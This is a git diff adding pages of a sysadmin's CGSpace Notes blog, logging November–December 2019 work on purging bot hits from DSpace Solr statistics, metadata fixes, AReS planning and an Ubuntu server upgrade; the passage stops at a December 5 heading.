+<li>For years 2010 until 2019 there are 1.6 million hits from these spider user agents</li>
+<li>For 2019 alone there are 740,000, over half of which come from Unpaywall!</li>
+<li>Looking at the facets I see there were about 200,000 hits from Unpaywall in 2019-10:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
+12&amp;q=userAgent:*Unpaywall*&#39; | xmllint --format - | less
+...
+  &lt;lst name=&#34;facet_counts&#34;&gt;
+    &lt;lst name=&#34;facet_queries&#34;/&gt;
+    &lt;lst name=&#34;facet_fields&#34;&gt;
+      &lt;lst name=&#34;dateYearMonth&#34;&gt;
+        &lt;int name=&#34;2019-10&#34;&gt;198624&lt;/int&gt;
+        &lt;int name=&#34;2019-05&#34;&gt;88422&lt;/int&gt;
+        &lt;int name=&#34;2019-06&#34;&gt;79911&lt;/int&gt;
+        &lt;int name=&#34;2019-09&#34;&gt;67065&lt;/int&gt;
+        &lt;int name=&#34;2019-07&#34;&gt;39026&lt;/int&gt;
+        &lt;int name=&#34;2019-08&#34;&gt;36889&lt;/int&gt;
+        &lt;int name=&#34;2019-04&#34;&gt;36512&lt;/int&gt;
+        &lt;int name=&#34;2019-11&#34;&gt;760&lt;/int&gt;
+      &lt;/lst&gt;
+    &lt;/lst&gt;
+</code></pre><ul>
+<li>That answers Peter&rsquo;s question about why the stats jumped in October&hellip;</li>
+</ul>
+<h2 id="2019-11-08">2019-11-08</h2>
+<ul>
+<li>I saw a bunch of user agents that have the literal string <code>User-Agent</code> in their user agent HTTP header, for example:
+<ul>
+<li><code>User-Agent: Drupal (+http://drupal.org/)</code></li>
+<li><code>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31</code></li>
+<li><code>User-Agent:Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) IKU/7.0.5.9226;IKUCID/IKU;</code></li>
+<li><code>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)</code></li>
+<li><code>User-Agent:User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C)IKU/6.7.6.12189;IKUCID/IKU;IKU/6.7.6.12189;IKUCID/IKU;</code></li>
+<li><code>User-Agent:Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) IKU/7.0.5.9226;IKUCID/IKU;</code></li>
+</ul>
+</li>
+<li>I filed <a href="https://github.com/atmire/COUNTER-Robots/issues/27">an issue</a> on the COUNTER-Robots project to see if they agree to add <code>User-Agent:</code> to the list of robot user agents</li>
+</ul>
+<h2 id="2019-11-09">2019-11-09</h2>
+<ul>
+<li>Deploy the latest <code>5_x-prod</code> branch on CGSpace (linode19)
+<ul>
+<li>This includes the updated CCAFS phase II project tags and the updated spider user agents</li>
+</ul>
+</li>
+<li>Run all system updates on CGSpace and reboot the server
+<ul>
+<li>After rebooting it seems that all Solr statistics cores came back up fine&hellip;</li>
+</ul>
+</li>
+<li>I did some work to clean up my bot processing script and removed about 2 million hits from the statistics cores on CGSpace
+<ul>
+<li>The script is called <code>check-spider-hits.sh</code></li>
+<li>After a bunch of tests and checks I ran it for each statistics shard like so:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ for shard in statistics statistics-2018 statistics-2017 statistics-2016 statistics-2015 stat
+istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do ./check-spider-hits.sh -s $shard -p yes; done
+</code></pre><ul>
+<li>Open a <a href="https://github.com/atmire/COUNTER-Robots/pull/28">pull request</a> against COUNTER-Robots to remove unnecessary escaping of dashes</li>
+</ul>
+<h2 id="2019-11-12">2019-11-12</h2>
+<ul>
+<li>Udana and Chandima emailed me to ask why <a href="https://hdl.handle.net/10568/81236">one of their WLE items</a> that is mapped from IWMI only shows up in the IWMI &ldquo;department&rdquo; on the Altmetric dashboard
+<ul>
+<li>A <a href="https://www.altmetric.com/explorer/outputs?department_id%5B%5D=CGSpace%3Agroup%3Acom_10568_16814&amp;q=Towards%20sustainable%20sanitation%20management">search in the IWMI department shows the item</a></li>
+<li>A <a href="https://www.altmetric.com/explorer/outputs?department_id%5B%5D=CGSpace%3Agroup%3Acom_10568_34494&amp;q=Towards%20sustainable%20sanitation%20management">search in the WLE department shows no results</a></li>
+<li>I emailed Altmetric support to ask for help</li>
+</ul>
+</li>
+<li>Also, while analysing this, I looked through some of the other top WLE items and fixed some metadata issues (adding <code>dc.rights</code>, fixing DOIs, adding ISSNs, etc) and noticed one issue with <a href="https://hdl.handle.net/10568/97087">an item</a> that has an Altmetric score for its Handle (lower) despite it having a correct DOI (with a higher score)
+<ul>
+<li>I tweeted the Handle to see if the score would get linked once Altmetric noticed it</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-13">2019-11-13</h2>
+<ul>
+<li>The <a href="https://hdl.handle.net/10568/97087">item with a low Altmetric score for its Handle</a> that I tweeted yesterday still hasn&rsquo;t linked with the DOI&rsquo;s score
+<ul>
+<li>I tweeted it again with the Handle and the DOI</li>
+</ul>
+</li>
+<li>Testing modifying some of the COUNTER-Robots patterns to use <code>[0-9]</code> instead of <code>\d</code> digit character type, as Solr&rsquo;s regex search can&rsquo;t use those</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;Scrapoo/1&#34;
+$ http &#34;http://localhost:8081/solr/statistics/update?commit=true&#34;
+$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&#34; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
+$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&#34; | xmllint --format - | grep numFound
+  &lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
+</code></pre><ul>
+<li>Nice, so searching with regex in Solr with <code>//</code> syntax works for those digits!</li>
+<li>I realized that it&rsquo;s easier to search Solr from curl via POST using this syntax:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:*Scrapoo*&amp;rows=0&#34;)
+</code></pre><ul>
+<li>If the parameters include something like &ldquo;[0-9]&rdquo; then curl interprets it as a range and will make ten requests
+<ul>
+<li>You can disable this using the <code>-g</code> option, but there are other benefits to searching with POST, for example it seems that I have less issues with escaping special parameters when using Solr&rsquo;s regex search:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select&#39; -d &#39;q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2&#39;
+</code></pre><ul>
+<li>I updated the <code>check-spider-hits.sh</code> script to use the POST syntax, and I&rsquo;m evaluating the feasability of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling</li>
+</ul>
+<h2 id="2019-11-14">2019-11-14</h2>
+<ul>
+<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
+<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I created a <a href="https://github.com/ilri/DSpace/pull/437">pull request</a> and merged them into the <code>5_x-prod</code> branch
+<ul>
+<li>I will deploy them to CGSpace in the next few days</li>
+</ul>
+</li>
+<li>Greatly improve my <code>check-spider-hits.sh</code> script to handle regular expressions in the spider agents patterns file
+<ul>
+<li>This allows me to detect and purge many more hits from the Solr statistics core</li>
+<li>I&rsquo;ve tested it quite a bit on DSpace Test, but I need to do a little more before I feel comfortable running the new code on CGSpace&rsquo;s Solr cores</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-15">2019-11-15</h2>
+<ul>
+<li>Run the new version of <code>check-spider-hits.sh</code> on CGSpace&rsquo;s Solr statistics cores one by one, starting from the oldest just in case something goes wrong</li>
+<li>But then I noticed that some (all?) of the hits weren&rsquo;t actually getting purged, all of which were using regular expressions like:
+<ul>
+<li><code>MetaURI[\+\s]API\/[0-9]\.[0-9]</code></li>
+<li><code>FDM(\s|\+)[0-9]</code></li>
+<li><code>Goldfire(\s|\+)Server</code></li>
+<li><code>^Mozilla\/4\.0\+\(compatible;\)$</code></li>
+<li><code>^Mozilla\/4\.0\+\(compatible;\+ICS\)$</code></li>
+<li><code>^Mozilla\/4\.5\+\[en]\+\(Win98;\+I\)$</code></li>
+</ul>
+</li>
+<li>Upon closer inspection, the plus signs seem to be getting misinterpreted somehow in the delete, but not in the select!</li>
+<li>Plus signs are special in regular expressions, URLs, and Solr&rsquo;s Lucene query parser, so I&rsquo;m actually not sure where the issue is
+<ul>
+<li>I tried to do URL encoding of the +, double escaping, etc&hellip; but nothing worked</li>
+<li>I&rsquo;m going to ignore regular expressions that have pluses for now</li>
+</ul>
+</li>
+<li>I think I might also have to ignore patterns that have percent signs, like <code>^\%?default\%?$</code></li>
+<li>After I added the ignores and did some more testing I finally ran the <code>check-spider-hits.sh</code> on all CGSpace Solr statistics cores and these are the number of hits purged from each core:
+<ul>
+<li>statistics-2010: 113</li>
+<li>statistics-2011: 7235</li>
+<li>statistics-2012: 0</li>
+<li>statistics-2013: 0</li>
+<li>statistics-2014: 316</li>
+<li>statistics-2015: 16809</li>
+<li>statistics-2016: 41732</li>
+<li>statistics-2017: 39207</li>
+<li>statistics-2018: 295546</li>
+<li>statistics: 1043373</li>
+</ul>
+</li>
+<li>That&rsquo;s 1.4 million hits in addition to the 2 million I purged earlier this week&hellip;</li>
+<li>For posterity, the major contributors to the hits on the statistics core were:
+<ul>
+<li>Purging 812429 hits from curl/ in statistics</li>
+<li>Purging 48206 hits from facebookexternalhit/ in statistics</li>
+<li>Purging 72004 hits from PHP/ in statistics</li>
+<li>Purging 76072 hits from Yeti/[0-9] in statistics</li>
+</ul>
+</li>
+<li>Most of the curl hits were from CIAT in mid-2019, where they were using <a href="https://guzzle3.readthedocs.io/http-client/client.html">GuzzleHttp</a> from PHP, which uses something like this for its user agent:</li>
+</ul>
+<pre tabindex="0"><code>Guzzle/&lt;Guzzle_Version&gt; curl/&lt;curl_version&gt; PHP/&lt;PHP_VERSION&gt;
+</code></pre><ul>
+<li>Run system updates on DSpace Test and reboot the server</li>
+</ul>
+<h2 id="2019-11-17">2019-11-17</h2>
+<ul>
+<li>Altmetric support responded about our dashboard question, asking if the second &ldquo;department&rdquo; (aka WLE&rsquo;s collection) was added recently and might have not been in the last harvesting yet
+<ul>
+<li>I told her no, that the department is several years old, and the item was added in 2017</li>
+<li>Then I looked again at the dashboard for each department and I see the item in both departments now&hellip; shit.</li>
+<li>A <a href="https://www.altmetric.com/explorer/outputs?department_id%5B%5D=CGSpace%3Agroup%3Acom_10568_16814&amp;q=Towards%20sustainable%20sanitation%20management">search in the IWMI department shows the item</a></li>
+<li>A <a href="https://www.altmetric.com/explorer/outputs?department_id%5B%5D=CGSpace%3Agroup%3Acom_10568_34494&amp;q=Towards%20sustainable%20sanitation%20management">search in the WLE department shows the item</a></li>
+</ul>
+</li>
+<li>I finally decided to revert <code>cg.hasMetadata</code> back to <code>cg.identifier.dataurl</code> in my CG Core v2 branch (see <a href="https://github.com/AgriculturalSemantics/cg-core/issues/10">#10</a>)</li>
+<li>Regarding the <a href="https://hdl.handle.net/10568/97087">WLE item</a> that has a much lower score than its DOI&hellip;
+<ul>
+<li>I tweeted the item twice last week and the score never got linked</li>
+<li>Then I noticed that I had already made a note about the same issue in 2019-04, when I also tweeted it several times&hellip;</li>
+<li>I will ask Altmetric support for help with that</li>
+</ul>
+</li>
+<li>Finally deploy <code>5_x-cgcorev2</code> branch on DSpace Test</li>
+</ul>
+<h2 id="2019-11-18">2019-11-18</h2>
+<ul>
+<li>I sent a mail to the CGSpace partners in Addis about the CG Core v2 changes on DSpace Test</li>
+<li>Then I filed an <a href="https://github.com/AgriculturalSemantics/cg-core/issues/11">issue on the CG Core GitHub</a> to let the metadata people know about our progress</li>
+<li>It seems like I will do a session about CG Core v2 implementation and limitations in DSpace for the data workshop in December in Nairobi (?)</li>
+</ul>
+<h2 id="2019-11-19">2019-11-19</h2>
+<ul>
+<li>Export IITA&rsquo;s community from CGSpace because they want to experiment with importing it into their internal DSpace for some testing or something
+<ul>
+<li>I had previously sent them an export in 2019-04</li>
+</ul>
+</li>
+<li>Atmire merged my <a href="https://github.com/atmire/COUNTER-Robots/pull/28">pull request regarding unnecessary escaping of dashes</a> in regular expressions, as well as <a href="https://github.com/atmire/COUNTER-Robots/issues/27">my suggestion of adding &ldquo;User-Agent&rdquo; to the list of patterns</a></li>
+<li>I made another <a href="https://github.com/atmire/COUNTER-Robots/pull/29">pull request to fix invalid escaping of one of their new patterns</a></li>
+<li>I ran my <code>check-spider-hits.sh</code> script again with these new patterns and found a bunch more statistics requests that match, for example:
+<ul>
+<li>Found 39560 hits from ^Buck/[0-9] in statistics</li>
+<li>Found 5471 hits from ^User-Agent in statistics</li>
+<li>Found 2994 hits from ^Buck/[0-9] in statistics-2018</li>
+<li>Found 14076 hits from ^User-Agent in statistics-2018</li>
+<li>Found 16310 hits from ^User-Agent in statistics-2017</li>
+<li>Found 4429 hits from ^User-Agent in statistics-2016</li>
+</ul>
+</li>
+<li>Buck is one I&rsquo;ve never heard of before, its user agent is:</li>
+</ul>
+<pre tabindex="0"><code>Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)
+</code></pre><ul>
+<li>All in all that&rsquo;s about 85,000 more hits purged, in addition to the 3.4 million I purged last week</li>
+</ul>
+<h2 id="2019-11-20">2019-11-20</h2>
+<ul>
+<li>Email Usman Muchlish from CIFOR to see what he&rsquo;s doing with their DSpace lately</li>
+</ul>
+<h2 id="2019-11-21">2019-11-21</h2>
+<ul>
+<li>Discuss bugs and issues with AReS v2 that are limiting its adoption
+<ul>
+<li>BUG: If you search for items between year 2012 and 2019, then remove some years from the &ldquo;info product analysis&rdquo;, they are still present in the search results and export</li>
+<li>FEATURE: Ability to add month to date filter?</li>
+<li>FEATURE: Add &ldquo;review status&rdquo;, &ldquo;series&rdquo;, and &ldquo;usage rights&rdquo; to search filters</li>
+<li>FEATURE: Downloads and views are not included in exports</li>
+<li>FEATURE: Add more fields to exports (Abenet will clarify)</li>
+</ul>
+</li>
+<li>As for the larger features to focus on in the future ToRs:
+<ul>
+<li>FEATURE: Unique, linkable URL for a set of search results (discussed with Moayad, he has a plan for this)</li>
+<li>FEATURE: Reporting that we talked about in Amman in January, 2019.</li>
+</ul>
+</li>
+<li>We have a meeting about AReS future developments with Jane, Abenet, Peter, and Enrico tomorrow</li>
+</ul>
+<h2 id="2019-11-22">2019-11-22</h2>
+<ul>
+<li>Skype with Jane, Abenet, Peter, and Enrico about AReS v2 future development
+<ul>
+<li>We want to move AReS v2 from dspacetest.cgiar.org/explorer to cgspace.cgiar.org/explorer</li>
+<li>We want to maintain a public demo of the vanilla OpenRXV with a subset of data, for example a non-CG community</li>
+<li>We want to try to move all issues and milestones to GitHub</li>
+<li>I need to try to work with ILRI Finance to pre-pay the AReS Linode server (linode11779072) for 2020</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-24">2019-11-24</h2>
+<ul>
+<li>I rebooted DSpace Test (linode19) and it kernel panicked at boot
+<ul>
+<li>I looked on the console and saw that it can&rsquo;t mount the root filesystem</li>
+<li>I switched the boot configuration to use the OS&rsquo;s kernel via GRUB2 instead of Linode&rsquo;s kernel and then it came up after reboot&hellip;</li>
+<li>I initiated a migration of the server from the Fremont, CA region to Frankfurt, DE
+<ul>
+<li>The migration is going very slowly, so I assume the network issues from earlier this year are still not fixed</li>
+<li>I opened a new ticket (13056701) with Linode support, with reference to my previous ticket (11804943)</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-25">2019-11-25</h2>
+<ul>
+<li>The migration of DSpace Test from Fremont, CA (USA) to Frankfurt (DE) region completed
+<ul>
+<li>The IP address of the server changed so I need to email CGNET to ask them to update the DNS</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-26">2019-11-26</h2>
+<ul>
+<li>Visit CodeObia to discuss future of OpenRXV and AReS
+<ul>
+<li>I started working on categorizing and validating the feedback that Jane collated into a spreadsheet last week</li>
+<li>I added GitHub issues for eight of the items so far, tagging them by &ldquo;bug&rdquo;, &ldquo;search&rdquo;, &ldquo;feature&rdquo;, &ldquo;graphics&rdquo;, &ldquo;low-priority&rdquo;, etc</li>
+<li>I moved AReS v2 to be available on CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-27">2019-11-27</h2>
+<ul>
+<li>Minor updates on the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>
+<ul>
+<li>Introduce isort for import sorting</li>
+<li>Introduce black for code formatting according to PEP8</li>
+<li>Fix some minor issues raised by flake8</li>
+<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.1.1">version 1.1.1</a> and deploy to DSpace Test (linode19)</li>
+<li>I realize that I never deployed version 1.1.0 (with falcon 2.0.0) on CGSpace (linode18) so I did that as well</li>
+</ul>
+</li>
+<li>File a ticket (242418) with Altmetric about DCTERMS migration to see if there is anything we need to be careful about</li>
+<li>Make a pull request against cg-core schema to fix inconsistent references to <code>cg.embargoDate</code> (<a href="https://github.com/AgriculturalSemantics/cg-core/pull/13">#13</a>)</li>
+<li>Review the AReS feedback again after Peter made some comments
+<ul>
+<li>I standardized the GitHub issue labels in both OpenRXV and AReS issue trackers, using labels like &ldquo;P-low&rdquo; for priority</li>
+<li>I filed another handful of issues in both trackers and added them to the spreadsheet</li>
+</ul>
+</li>
+<li>I need to ask Marie-Angelique about the <code>cg.peer-reviewed</code> field
+<ul>
+<li>We currently use <code>dc.description.version</code> with values like &ldquo;Internal Review&rdquo; and &ldquo;Peer Review&rdquo;, and CG Core v2 currently recommends using &ldquo;True&rdquo; if the field is peer reviewed</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-11-28">2019-11-28</h2>
+<ul>
+<li>File an issue with CG Core v2 project to ask Marie-Angelique about expanding the scope of <code>cg.peer-reviewed</code> to include other types of review, and possibly to change the field name to something more generic like <code>cg.review-status</code> (<a href="https://github.com/AgriculturalSemantics/cg-core/issues/14">#14</a>)</li>
+<li>More review of AReS feedback
+<ul>
+<li>I clarified some of the feedback</li>
+<li>I added status of &ldquo;Issue Filed&rdquo;, &ldquo;Duplicate&rdquo; and &ldquo;No Action Required&rdquo; to several items</li>
+<li>I filed a handful more GitHub issues in AReS and OpenRXV GitHub trackers</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-12/index.html b/docs/2019-12/index.html
new file mode 100644
index 000000000..3e8ca27c7
--- /dev/null
+++ b/docs/2019-12/index.html
@@ -0,0 +1,458 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2019" />
+<meta property="og:description" content="2019-12-01
+
+Upgrade CGSpace (linode18) to Ubuntu 18.04:
+
+Check any packages that have residual configs and purge them:
+# dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P
+Make sure all packages are up to date and the package manager is up to date, then reboot:
+
+
+
+# apt update &amp;&amp; apt full-upgrade
+# apt-get autoremove &amp;&amp; apt-get autoclean
+# dpkg -C
+# reboot
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-12/" />
+<meta property="article:published_time" content="2019-12-01T11:22:30+02:00" />
+<meta property="article:modified_time" content="2019-12-30T14:28:15+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2019"/>
+<meta name="twitter:description" content="2019-12-01
+
+Upgrade CGSpace (linode18) to Ubuntu 18.04:
+
+Check any packages that have residual configs and purge them:
+# dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P
+Make sure all packages are up to date and the package manager is up to date, then reboot:
+
+
+
+# apt update &amp;&amp; apt full-upgrade
+# apt-get autoremove &amp;&amp; apt-get autoclean
+# dpkg -C
+# reboot
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-12/",
+  "wordCount": "1551",
+  "datePublished": "2019-12-01T11:22:30+02:00",
+  "dateModified": "2019-12-30T14:28:15+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-12/">
+
+    <title>December, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-12/">December, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-12-01T11:22:30+02:00">Sun Dec 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-12-01">2019-12-01</h2>
+<ul>
+<li>Upgrade CGSpace (linode18) to Ubuntu 18.04:
+<ul>
+<li>Check any packages that have residual configs and purge them:</li>
+<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li>
+<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade
+# apt-get autoremove &amp;&amp; apt-get autoclean
+# dpkg -C
+# reboot
+</code></pre><ul>
+<li>Take some backups:</li>
+</ul>
+<pre tabindex="0"><code># dpkg -l &gt; 2019-12-01-linode18-dpkg.txt
+# tar czf 2019-12-01-linode18-etc.tar.gz /etc
+</code></pre><ul>
+<li>Then check all third-party repositories in /etc/apt to see if everything using &ldquo;xenial&rdquo; has packages available for &ldquo;bionic&rdquo; and then update the sources:</li>
+<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/&rsquo; /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
+<li>Pause the Uptime Robot monitoring for CGSpace</li>
+<li>Make sure the update manager is installed and do the upgrade:</li>
+</ul>
+<pre tabindex="0"><code># apt install update-manager-core
+# do-release-upgrade
+</code></pre><ul>
+<li>After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:</li>
+</ul>
+<pre tabindex="0"><code># apt purge openjdk-11-jre-headless
+# apt install &#39;nginx=1.16.1-1~bionic&#39;
+# reboot
+</code></pre><ul>
+<li>After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it&rsquo;s working:</li>
+</ul>
+<pre tabindex="0"><code># rm -rf /opt/eff.org/certbot/venv/bin/letsencrypt
+# rm -rf /opt/ilri/dspace-statistics-api/venv
+# /opt/certbot-auto
+</code></pre><ul>
+<li>Clear Ansible&rsquo;s fact cache and re-run the playbooks to update the system&rsquo;s firewalls, SSH config, etc</li>
+<li>Altmetric finally responded to my question about Dublin Core fields
+<ul>
+<li>They shared a <a href="https://help.altmetric.com/support/solutions/articles/6000141419-what-metadata-is-required-to-track-our-content-">list of fields they use for tracking</a>, but it only mentions HTML meta tags, and not fields considered when harvesting via OAI</li>
+<li>Anyways, there might be some areas we can improve on the HTML meta tags, if I look at one <a href="https://hdl.handle.net/10568/101623">item with a DOI, ISSN, etc</a> I see that we could at least add status (Open Access) and journal title</li>
+<li>I merged a <a href="https://github.com/ilri/DSpace/pull/438">pull request</a> into the <code>5_x-prod</code> branch to add status and journal title to the XHTML meta tags</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-12-02">2019-12-02</h2>
+<ul>
+<li>Raise the issue of old, low-quality thumbnails with Peter and the CGSpace team
+<ul>
+<li>I suggested that we move manually uploaded thumbnails from the <code>ORIGINAL</code> bundle to the <code>THUMBNAIL</code> bundle</li>
+<li>Also replace old thumbnails where an item is available on Slideshare or YouTube because those are easy to get new, high-quality thumbnails for</li>
+</ul>
+</li>
+<li>Continue testing CG Core v2 implementation on DSpace Test
+<ul>
+<li>Compare the OAI QDC representation of a few items on CGSpace vs DSpace Test:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/cgspace-104030.xml
+$ http &#39;https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/dspacetest-104030.xml
+</code></pre><ul>
+<li>The DSpace Test ones actually now capture the DOI, where the CGSpace doesn&rsquo;t&hellip;</li>
+<li>And the DSpace Test one doesn&rsquo;t include review status as <code>dc.description</code>, but I don&rsquo;t think that&rsquo;s an important field</li>
+</ul>
+<h2 id="2019-12-04">2019-12-04</h2>
+<ul>
+<li>Peter noticed that there were about seventy items on CGSpace that were marked as private
+<ul>
+<li>Some have been withdrawn, but I extracted a list of the forty-eight that were not:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable=&#39;f&#39; AND item.in_archive=&#39;t&#39; AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
+COPY 48
+</code></pre><h2 id="2019-12-05">2019-12-05</h2>
+<ul>
